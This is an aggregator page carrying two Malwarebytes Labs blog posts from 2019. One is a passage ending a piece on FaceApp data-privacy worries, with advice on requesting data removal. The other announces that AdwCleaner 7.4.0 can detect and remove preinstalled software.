“We didn’t see any suspicious increase in the size of outbound traffic that would indicate a leak of data beyond permitted uploads,” Buzzfeed News wrote. “We uploaded four pictures to FaceApp, which corresponds with the four spikes in the graphic, with some noise at the end after the fourth upload.”

Finally, despite the many distressed comments on Twitter, Goncharov also told The Washington Post that his company is not using its technology for any facial recognition purposes.

What you should do

We get it—FaceApp is fun. Sadly, for many, online privacy is less so. (We disagree.) But that does not make online privacy any less important.

For those of you who have already downloaded and used FaceApp, the company recently described an ad-hoc method for removing your data from their servers:

“We accept requests from users for removing all their data from our servers. Our support team is currently overloaded, but these requests have our priority. For the fastest processing, we recommend sending the requests from the FaceApp mobile app using ‘Settings->Support->Report a bug’ with the word ‘privacy’ in the subject line. We are working on the better UI for that.”

For those of you who want to avoid these types of problems in the future, there’s a simple rule: Read an app’s terms of service agreement and privacy policy before you download and use it. If the agreements and policies are too long to read through—or too filled with jargon to parse—you can always avoid downloading the app altogether.

Always remember, the fear of missing out on the latest online craze should be weighed against the fear of having your online privacy potentially invaded.

The post FaceApp scares point to larger data collection problems appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Your device, your choice: AdwCleaner now detects preinstalled software

Malwarebytes - Tue, 07/23/2019 - 21:40

For years, Malwarebytes has held firm to a core belief about you, the user: You should be able to decide for yourself which apps, programs, browsers, and other software end up on your computer, tablet, or mobile phone.

Basically, it’s your device, your choice.

With the latest update to Malwarebytes AdwCleaner, we are working to further cement that belief into reality. AdwCleaner 7.4.0 now detects preinstalled software.

What is preinstalled software? Preinstalled software is software that typically comes pre-loaded on a new computer separate from the operating system. Most preinstalled software is not necessary for the proper functioning of your computer. In fact, in some cases, it may have the negative effect of impacting the computer’s performance by using memory, CPU, and hard drive resources. 

Preinstalled software can be the manufacturer-provided systems control panel. It can be the long-outdated antivirus scanner. It can be the never-heard-of photo editor, the wedged-in social gaming platform, the all-too-sticky online comparison shopper. 

So, why remove it? Besides the potential for performance impacts, we simply feel that when you buy a device—whether that’s a laptop for school, work, or fun—you should have the right to choose which programs are installed. That right should also apply to the types of software that can show up preinstalled with a device, before you even had a say in the matter.

Preinstalled software applications can be difficult to remove. They linger, buzzing around your digital environment while dodging simple uninstall attempts. We want to change that.

We also want to be clear here: Preinstalled software is not malicious. Instead, for some users, preinstalled applications serve more as an annoyance.

Advanced users typically prefer to remove all non-essential applications from their systems. With the latest version of AdwCleaner, we extend that capability to users of all technical abilities. AdwCleaner now allows users the option to quarantine and uninstall unnecessary, sometimes performance-degrading, preinstalled applications.

Is there a pre-packaged app that is not necessary for your machine to run? You have the option to get rid of it. Is there a pre-installed, superfluous program taking up vital space on your computer? Feel free to get rid of it.
And if you accidentally remove a preinstalled application by mistake, the newest version of AdwCleaner allows you to completely restore it from the quarantine.

You should be able to choose the programs that end up on your device. With the latest update to Malwarebytes AdwCleaner, that choice is in closer reach.

The post Your device, your choice: AdwCleaner now detects preinstalled software appeared first on Malwarebytes Labs.

Categories: Techie Feeds


Subscribe to Furiously Eclectic People aggregator - Techie Feeds